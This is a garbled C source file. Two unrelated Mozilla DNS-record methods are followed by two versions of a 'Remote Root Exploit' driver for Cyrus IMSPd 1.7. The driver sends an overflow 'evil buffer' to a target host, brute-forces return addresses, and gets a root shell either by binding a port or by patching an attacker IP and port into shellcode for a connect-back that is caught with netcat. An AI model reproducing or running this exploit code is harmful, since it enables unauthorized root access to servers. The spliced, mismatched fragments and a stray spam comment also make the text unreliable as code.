NS_IMETHODIMP
nsDNSRecord::GetNextAddrAsString(nsACString &result)
{
PRNetAddr addr;
nsresult rv = GetNextAddr(0, &addr);
if (NS_FAILED(rv)) return rv;
char buf[64];
if (PR_NetAddrToString(&addr, buf, sizeof(buf)) == PR_SUCCESS) {
result.Assign(buf);
return NS_OK;
}
NS_ERROR("PR_NetAddrToString failed unexpectedly");
return NS_ERROR_FAILURE; // conversion failed for some reason
}
NS_IMETHODIMP
nsDNSRecord::HasMore(PRBool *result)
{
if (mDone)
*result = PR_FALSE;
else {
// unfortunately, NSPR does not provide a way for us to determine if
// there is another address other than to simply get the next address.
void *iterCopy = mIter;
PRNetAddr addr;
*result = NS_SUCCEEDED(GetNextAddr(0, &addr));
mIter = iterCopy; // backup iterator
mDone = PR_FALSE;
}
return NS_OK;
}
int main(int argc, char **argv)
{
extern char *optarg;
extern int optind;
char opt;
char *Host = NULL;
int Port = DEFAULT_PORT;
int Flags = 0;
int StartAddress = DEFAULT_START_ADDRESS;
int TargetNumber = 0;
int Sock,rootSock,i;
char *EvilBuffer;
int BindPort = ROOT_PORT;
fprintf(stdout,"\n==[ Cyrus IMSPd 1.7 Remote Root Exploit bY SpikE ]==\n\n");
// Process arguments
while ( (opt = getopt(argc,argv,"h:t:p:ba:r:")) != EOF)
{
switch(opt)
{
case 'r':
BindPort = atoi(optarg);
if(!BindPort) Usage(argv[0]);
break;
case 'h':
Host = optarg;
break;
case 'p':
Port = atoi(optarg);
if(!Port) Usage(argv[0]);
break;
case 'b':
if(Flags == 0)
Flags = BRUTEFORCE;
else
Usage(argv[0]);
break;
case 'a':
if( sscanf(optarg,"0x%lx",&StartAddress) != 1)
Usage(argv[0]);
break;
case 't':
TargetNumber = atoi(optarg);
if(Flags == 0)
Flags = TARGET;
else
Usage(argv[0]);
break;
default: Usage(argv[0]);
break;
}
}
if(Host == NULL || Flags == 0) Usage(argv[0]);
// Verify target
for(i=0;;i++)
if(Targets[i].Name == 0) break;
if(--i<TargetNumber) Usage(argv[0]);
if(Flags == TARGET)
fprintf(stdout,"*** Target plataform : %s\n",Targets[TargetNumber].Name);
fprintf(stdout,"*** Target host : %s\n",Host);
fprintf(stdout,"*** Target port : %u\n",Port);
fprintf(stdout,"*** Bind to port : %u\n",BindPort);
if(Flags == TARGET)
fprintf(stdout,"*** Target RET : %#010x\n\n",Targets[TargetNumber].Retaddr);
else
fprintf(stdout,"*** Bruteforce mode start : %#010x\n\n",StartAddress);
switch(Flags)
{
case TARGET:
Sock = ConectToHost(Host,Port);
if(Sock == -1) fatal("Could not connect");
else fprintf(stdout,"[+] Connected\n");
fprintf(stdout,"[+] Creating evil buffer\n");
EvilBuffer = CreateEvilBuffer(Targets[TargetNumber].Retaddr,BindPort);
fprintf(stdout,"[+] Sending evil buffer\n");
scanf("%d",&i);
send(Sock,EvilBuffer,strlen(EvilBuffer),0);
sleep(1);
fprintf(stdout,"[+] Verifying ...\n");
sleep(1);
if( (rootSock = VerifyXpl(Host,BindPort)) >=0)
{
close(Sock);
free(EvilBuffer);
fprintf(stdout,"[+] Yeap.. It is a root shell\n\n");
doHack(rootSock);
close(rootSock);
exit(0);
}
else
fatal("No root shell. Maybe next time");
break;
default:
for(;;)
{
fprintf(stdout,"[+] Using RetAddr = %#010x\n",StartAddress);
Sock = ConectToHost(Host,Port);
if(Sock == -1)
{
// To avoid stop the bruteforce
fprintf(stdout,"[+] Could not connect. Waiting...\n\n");
sleep(120);
}
else
{
fprintf(stdout,"[+] Connected\n");
fprintf(stdout,"[+] Creating evil buffer\n");
EvilBuffer = CreateEvilBuffer(StartAddress,BindPort);
fprintf(stdout,"[+] Sending evil buffer\n");
send(Sock,EvilBuffer,strlen(EvilBuffer),0);
sleep(1);
fprintf(stdout,"[+] Verifying ...\n");
sleep(1);
if( (rootSock = VerifyXpl(Host,BindPort)) >=0)
{ // actualite informatique
close(Sock);
free(EvilBuffer);
fprintf(stdout,"[+] Yeap.. It is a root shell\n\n");
doHack(rootSock);
close(rootSock);
exit(0);
}
close(Sock);
free(EvilBuffer);
fprintf(stdout,"\n");
StartAddress = GetNextAddr(StartAddress);
}
}
break;
}
free(EvilBuffer);
close(Sock);
}
int main(int argc, char **argv)
{
extern char *optarg;
extern int optind;
char opt;
char *Host = NULL;
int Port = DEFAULT_PORT;
int Flags = 0;
int StartAddress = DEFAULT_START_ADDRESS;
int TargetNumber = 0;
int Sock,rootSock,i;
char *EvilBuffer;
int CBackPort = 0;
char Addr[20];
int IP0 = 0,IP1 = 0,IP2 = 0,IP3 = 0;
char *IPPtr,*CBackPortPtr;
unsigned short *PortPtr = (unsigned short *)(Shellcode+39);
fprintf(stdout,"\n==[ Cyrus IMSPd 1.7 Remote Root Exploit ]==\n\n");
// Process arguments
while ( (opt = getopt(argc,argv,"h:t:p:ba:r:i:")) != EOF)
{
switch(opt)
{
case 'i':
if( sscanf(optarg,"%d.%d.%d.%d" ,&IP3,&IP2,&IP1,&IP0) != 4)
Usage(argv[0]);
IPPtr = optarg;
break;
case 'r':
CBackPort = atoi(optarg);
if(!CBackPort) Usage(argv[0]);
CBackPortPtr = optarg;
break;
case 'h':
Host = optarg;
break;
case 'p':
Port = atoi(optarg);
if(!Port) Usage(argv[0]);
break;
case 'b':
if(Flags == 0)
Flags = BRUTEFORCE;
else
Usage(argv[0]);
break;
case 'a':
if( sscanf(optarg,"0x%lx",&StartAddress) != 1)
Usage(argv[0]);
break;
case 't':
TargetNumber = atoi(optarg);
if(Flags == 0)
Flags = TARGET;
else
Usage(argv[0]);
break;
default: Usage(argv[0]);
break;
}
}
if(Host == NULL || Flags == 0) Usage(argv[0]);
if(CBackPort == 0) Usage(argv[0]);
if(IP0 ==0 || IP1 == 0 || IP2 == 0 || IP3 == 0) Usage(argv[0]);
// Verify target
for(i=0;;i++)
if(Targets[i].Name == 0) break;
if(--i<TargetNumber) Usage(argv[0]);
// Update shellcode
Shellcode[33] = IP3;
Shellcode[34] = IP2;
Shellcode[35] = IP1;
Shellcode[36] = IP0;
*PortPtr = htons((unsigned short)CBackPort);
if(Flags == TARGET)
fprintf(stdout,"*** Target plataform : %s\n",Targets[TargetNumber].Name);
fprintf(stdout,"*** Target host : %s\n",Host);
fprintf(stdout,"*** Target port : %u\n",Port);
fprintf(stdout,"*** IP to connect back : %u.%u.%u.%u\n" ,IP3,IP2,IP1,IP0);
fprintf(stdout,"*** Port to connect back : %u\n",CBackPort);
if(Flags == TARGET)
fprintf(stdout,"*** Target RET : %#010x\n\n",Targets[TargetNumber].Retaddr);
else
fprintf(stdout,"*** Bruteforce mode start : %#010x\n\n",StartAddress);
switch(Flags)
{
case TARGET:
Sock = ConectToHost(Host,Port);
if(Sock == -1) fatal("Could not connect");
else fprintf(stdout,"[+] Connected\n");
fprintf(stdout,"[+] Creating evil buffer\n");
EvilBuffer = CreateEvilBuffer(Targets[TargetNumber].Retaddr);
fprintf(stdout,"[+] Sending evil buffer\n");
send(Sock,EvilBuffer,strlen(EvilBuffer),0);
sleep(1);
fprintf(stdout,"[+] Wait for root shell on your netcat\n\n");
break;
default:
for(;;)
{
fprintf(stdout,"[+] Using RetAddr = %#010x\n",StartAddress);
Sock = ConectToHost(Host,Port);
if(Sock == -1)
{
// To avoid stop bruteforce
fprintf(stdout,"[-] Error. Restarting ...\n\n");
sleep(1);
sprintf(Addr,"%#010x",StartAddress);
execl(argv[0],argv[0],"-h",Host,"-b","-a",Addr,"-i",IPPtr,"-r",CBackPortPtr,0);
}
else
{
fprintf(stdout,"[+] Connected\n");
fprintf(stdout,"[+] Creating evil buffer\n");
EvilBuffer = CreateEvilBuffer(StartAddress);
fprintf(stdout,"[+] Sending evil buffer\n");
send(Sock,EvilBuffer,strlen(EvilBuffer),0);
sleep(1);
close(Sock);
free(EvilBuffer);
fprintf(stdout,"\n");
StartAddress = GetNextAddr(StartAddress);
}
}
break;
}
free(EvilBuffer);
close(Sock);
}
